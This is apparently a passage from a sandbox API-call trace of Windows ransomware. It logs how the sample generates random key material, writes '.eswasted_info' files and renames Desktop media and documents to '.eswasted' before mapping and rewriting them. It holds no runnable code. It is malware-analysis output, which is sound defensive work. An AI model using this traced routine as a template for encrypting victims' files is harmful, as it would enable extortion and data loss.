0x330000 [0073.424] CloseHandle (hObject=0x124) returned 1 [0073.427] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.428] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.428] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.428] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.429] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.429] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.438] SetEndOfFile (hFile=0x130) returned 1 [0073.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.440] CloseHandle (hObject=0x130) returned 1 [0073.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718470 | out: hHeap=0x6d0000) returned 1 [0073.442] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.443] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.443] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.443] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tiSxMocb HmQZEi.flv") returned 61 [0073.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x70c160 [0073.443] lstrcpyW (in: lpString1=0x70c1da, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.444] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.444] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.444] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.444] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tiSxMocb HmQZEi.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tisxmocb hmqzei.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.445] WriteFile (in: hFile=0x130, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.446] SetEndOfFile (hFile=0x130) returned 1 [0073.446] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.446] lstrcpyW (in: lpString1=0x70c1da, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tiSxMocb HmQZEi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tisxmocb hmqzei.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tiSxMocb HmQZEi.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tisxmocb hmqzei.flv.eswasted")) returned 1 [0073.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tiSxMocb HmQZEi.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tisxmocb hmqzei.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.447] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.447] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x3dd3 [0073.447] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3dd3) returned 0x330000 [0073.447] CloseHandle (hObject=0x108) returned 1 [0073.496] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.498] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.498] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.499] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.501] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.501] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.542] SetEndOfFile (hFile=0x130) returned 1 [0073.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.545] CloseHandle (hObject=0x130) returned 1 [0073.550] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.550] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718538 | out: hHeap=0x6d0000) returned 1 [0073.550] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.555] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.555] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\unn z0iEwxlgp5Vg OO.avi") returned 65 [0073.556] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x70c160 [0073.556] lstrcpyW (in: lpString1=0x70c1e2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.557] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.558] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.563] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.564] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\unn z0iEwxlgp5Vg OO.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\unn z0iewxlgp5vg oo.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.569] WriteFile (in: hFile=0x130, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.573] SetEndOfFile (hFile=0x130) returned 1 [0073.573] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.574] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.574] lstrcpyW (in: lpString1=0x70c1e2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\unn z0iEwxlgp5Vg OO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\unn z0iewxlgp5vg oo.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\unn z0iEwxlgp5Vg OO.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\unn z0iewxlgp5vg oo.avi.eswasted")) returned 1 [0073.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\unn z0iEwxlgp5Vg OO.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\unn z0iewxlgp5vg oo.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.584] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.586] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x10fac [0073.586] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10fac) returned 0x330000 [0073.586] CloseHandle (hObject=0x124) returned 1 [0073.601] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.602] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.602] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.602] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.603] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.603] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.663] SetEndOfFile (hFile=0x130) returned 1 [0073.667] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.667] CloseHandle (hObject=0x130) returned 1 [0073.685] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.685] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7186e0 | out: hHeap=0x6d0000) returned 1 [0073.685] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.686] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.686] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.686] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\wcoSsouqjkx-.m4a") returned 80 [0073.686] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x6f6880 [0073.687] lstrcpyW (in: lpString1=0x6f6920, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.687] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.687] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.687] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.687] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.688] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\wcoSsouqjkx-.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\wcossouqjkx-.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.733] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.735] SetEndOfFile (hFile=0x11c) returned 1 [0073.735] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.735] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.735] lstrcpyW (in: lpString1=0x6f6920, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\wcoSsouqjkx-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\wcossouqjkx-.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\wcoSsouqjkx-.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\wcossouqjkx-.m4a.eswasted")) returned 1 [0073.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\wcoSsouqjkx-.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\wcossouqjkx-.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.736] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0073.736] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x2de9 [0073.736] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2de9) returned 0x330000 [0073.736] CloseHandle (hObject=0x108) returned 1 [0073.740] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.741] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.741] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.741] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.742] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.742] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.764] SetEndOfFile (hFile=0x11c) returned 1 [0073.767] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.767] CloseHandle (hObject=0x11c) returned 1 [0073.769] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0073.769] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c090 | out: hHeap=0x6d0000) returned 1 [0073.769] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.770] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.770] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\pkkgt4GR.wav") returned 66 [0073.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28e) returned 0x6f5cc0 [0073.770] lstrcpyW (in: lpString1=0x6f5d44, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.771] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.771] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.772] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\pkkgt4GR.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\pkkgt4gr.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.773] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.774] SetEndOfFile (hFile=0x11c) returned 1 [0073.774] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.774] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.775] lstrcpyW (in: lpString1=0x6f5d44, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\pkkgt4GR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\pkkgt4gr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\pkkgt4GR.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\pkkgt4gr.wav.eswasted")) returned 1 [0073.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\pkkgt4GR.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\pkkgt4gr.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.776] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.776] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x3b7d [0073.776] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b7d) returned 0x330000 [0073.776] CloseHandle (hObject=0x130) returned 1 [0073.830] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.831] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.831] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.831] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.832] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.832] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.843] SetEndOfFile (hFile=0x11c) returned 1 [0073.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.846] CloseHandle (hObject=0x11c) returned 1 [0073.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.848] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c278 | out: hHeap=0x6d0000) returned 1 [0073.848] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0073.849] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0073.849] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\Rcd2Qcy.odt") returned 65 [0073.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x1412c98 [0073.850] lstrcpyW (in: lpString1=0x1412d1a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.850] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0073.851] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.851] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\Rcd2Qcy.odt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\rcd2qcy.odt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.852] WriteFile (in: hFile=0x11c, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0073.853] SetEndOfFile (hFile=0x11c) returned 1 [0073.853] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.853] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.853] lstrcpyW (in: lpString1=0x1412d1a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\Rcd2Qcy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\rcd2qcy.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\Rcd2Qcy.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\rcd2qcy.odt.eswasted")) returned 1 [0073.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\Rcd2Qcy.odt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\rcd2qcy.odt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.854] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0073.854] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x15d31 [0073.854] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15d31) returned 0x330000 [0073.854] CloseHandle (hObject=0x108) returned 1 [0073.859] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0073.860] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.860] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.861] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0073.861] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0073.861] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.921] SetEndOfFile (hFile=0x11c) returned 1 [0073.924] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.924] CloseHandle (hObject=0x11c) returned 1 [0073.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: 